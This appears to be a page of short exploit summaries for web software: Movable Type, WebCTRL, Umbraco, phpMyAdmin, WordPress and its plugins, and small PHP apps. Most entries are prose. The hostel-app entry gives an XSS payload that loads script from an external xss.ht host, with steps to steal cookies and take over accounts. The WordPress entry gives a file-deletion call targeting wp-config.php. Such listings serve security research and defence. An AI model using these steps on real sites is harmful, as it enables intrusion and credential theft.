This module exploit Movable Type XMLRPC API Remote Command Injection. It sends a POST request to the mt-xmlrpc.cgi endpoint with a base64 encoded command. If the response code is 200 and the response body includes the fingerprint, then the vulnerability is exploited.
The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows for reflected XSS attacks due to the operatorlocale GET parameter not being sanitized. This issue works by passing in a basic XSS payload to a vulnerable GET parameter that is reflected in the output without sanitization.
Umbraco CMS v8.14.1 is vulnerable to Server-Side Request Forgery (SSRF) due to improper input validation of the 'baseUrl' parameter in the 'Umbraco.Web.Editors.HelpController.GetContextHelpForPage()', 'Umbraco.Web.Editors.DashboardController.GetRemoteDashboardContent()', and 'Umbraco.Web.Editors.DashboardController.GetRemoteDashboardCss()' functions. An attacker can exploit this vulnerability by sending a crafted request to the vulnerable functions with a malicious 'baseUrl' parameter. This can allow an attacker to access internal resources, such as the local network, and potentially gain access to sensitive information.
Navigate to http://localhost/hostel/hostel/my-profile.php and enter xss payload '><script src=https://anubhav1403.xss.ht></script> in name field. Click on Update Profile and intercept the request in Burpsuite. Generate a CSRF POC of Update Profile and send it to victim. When victim open the POC, his/her name will be updated to our XSS payload & payload will get fires. Attacker is able to steal Victim's cookies successfully!! Account takeover!!!
A stored cross-site scripting (XSS) vulnerability exists in WordPress Plugin Supsystic Contact Form 1.7.18. An attacker can inject a malicious JavaScript payload into the 'label' field, which will be executed when the page is viewed by an authenticated user.
A stored Cross-Site Scripting (XSS) vulnerability exists in WordPress Plugin Filterable Portfolio Gallery 1.0, which allows an attacker to inject malicious JavaScript code into the 'title' field. An attacker can exploit this vulnerability by entering a malicious JavaScript payload into the 'title' field, saving and previewing it. The payload will be stored in the database and will be executed when the page is viewed.
A vulnerability in phpMyAdmin 4.8.1 allows an attacker to execute arbitrary code on the server by sending a specially crafted request to the import.php page. The vulnerability is due to insufficient validation of user-supplied input when handling SQL queries. An attacker can exploit this vulnerability to execute arbitrary code on the server.
An authenticated user with privileges of an author can delete arbitrary files on the server by exploiting a vulnerability in the WordPress 4.9.6 version. The user can navigate to Media > Add New > Select Files > Open/Upload and click Edit > Open Developer Console > Paste this exploit script and execute the function, eg: unlink_thumb('../../../../wp-config.php').
A stored XSS vulnerability exists in the WordPress Plugin Media-Tags version 3.2.0.2. An attacker can inject malicious JavaScript payload into the 'Media Tag Label Fields' user input field, which will be stored in the database. When the same functionality is triggered, the malicious payload will be executed, resulting in a pop-up.
An SQL Injection vulnerability exists in the Engineers Online Portal. An attacker can leverage the vulnerable "id" parameter in the "quiz_question.php" web page in order to manipulate the sql query performed. As a result he can extract sensitive data from the web server and in some cases he can use this vulnerability in order to get a remote code execution on the remote web server.
Services By CQR